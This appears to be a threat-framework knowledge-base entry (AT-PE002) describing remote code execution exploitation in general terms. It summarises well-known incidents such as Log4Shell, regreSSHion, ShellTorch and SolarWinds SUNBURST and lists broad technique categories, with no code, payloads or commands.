Skip to content

Remote Code Execution Exploitation

Info

ID: AT-PE002
Tactic: Payload Execution
Sub-techniques: Dynamic Code Evaluation, Insecure Deserialization Exploitation, Memory Buffer Overflow, Memory Pointer Manipulation

Remote Code Execution Exploitation

Remote Code Execution (RCE) Exploitation refers to adversaries identifying and leveraging application vulnerabilities that allow them to execute arbitrary code within the target's runtime environment. Common entry points for RCE include memory corruption flaws (e.g., buffer overflows or pointer manipulation), insecure deserialization routines, or unsafe dynamic code evaluation methods. Once triggered, RCE grants attackers direct control over backend processes, enabling them to deploy malware, escalate privileges, or pivot to other services.

Cloud-native applications with microservices, serverless components, or extensive third-party dependencies can inadvertently introduce more RCE opportunities. For instance, libraries that parse untrusted data or frameworks that dynamically compile templates can contain logic gaps if not carefully sandboxed. Unlike higher-level injection attacks, RCE vulnerabilities give adversaries immediate operational control of the application's own execution flow, posing a critical risk to both availability and data integrity.

Examples in the Wild

Notable Remote Code Execution Exploits and Their Impact:

Log4Shell (CVE-2021-44228) The Log4Shell vulnerability in Apache Log4j allowed attackers to achieve remote code execution by sending specially crafted strings that would be logged by vulnerable applications. When Log4j processed these strings, it would make JNDI LDAP/RMI requests to attacker-controlled servers that could respond with malicious Java code to be executed. This vulnerability affected millions of Java applications and services worldwide, including Apple iCloud, Amazon Web Services, Cisco, IBM, Microsoft, and Twitter.

regreSSHion (CVE-2024-6387, CVE-2024-6409) The regreSSHion attack exploited a critical regression vulnerability in OpenSSH that reintroduced a previously patched race condition from 2006. This vulnerability enabled unauthenticated remote code execution as root on glibc-based Linux systems through a signal handler race condition in sshd. Over 14 million potentially vulnerable OpenSSH instances were exposed to the internet, with 700,000 vulnerable instances identified in the Qualys customer base alone.

ShellTorch (CVE-2023-43654) The ShellTorch attack demonstrated a sophisticated RCE chain targeting AI infrastructure through PyTorch's TorchServe framework. By combining SSRF and unsafe YAML deserialization vulnerabilities, attackers could achieve remote code execution on model serving infrastructure. This affected major organizations including Google Cloud AI Platform, Amazon SageMaker, Microsoft Azure ML, and Tesla AI Infrastructure.

SolarWinds SUNBURST The SolarWinds supply chain attack achieved RCE through a compromised software update mechanism. The SUNBURST backdoor enabled remote code execution within compromised environments by executing arbitrary commands received through its command and control channel, all while operating within the trusted SolarWinds process space.

Attack Mechanism

Common RCE Exploitation Techniques:

  1. Protocol-Level Exploitation
  2. JNDI injection through Log4j (Log4Shell)
  3. SMB protocol exploitation (WannaCry)

  4. SSH signal handler race conditions (regreSSHion)

  5. Deserialization Vulnerabilities

  6. YAML deserialization in TorchServe (ShellTorch)
  7. Java object deserialization

  8. XML external entity processing

  9. Supply Chain Compromises

  10. Backdoored software updates (SolarWinds)
  11. Compromised build processes

  12. Malicious dependency injection

  13. Memory Corruption

  14. Buffer overflows in system services
  15. Use-after-free vulnerabilities
  16. Type confusion exploits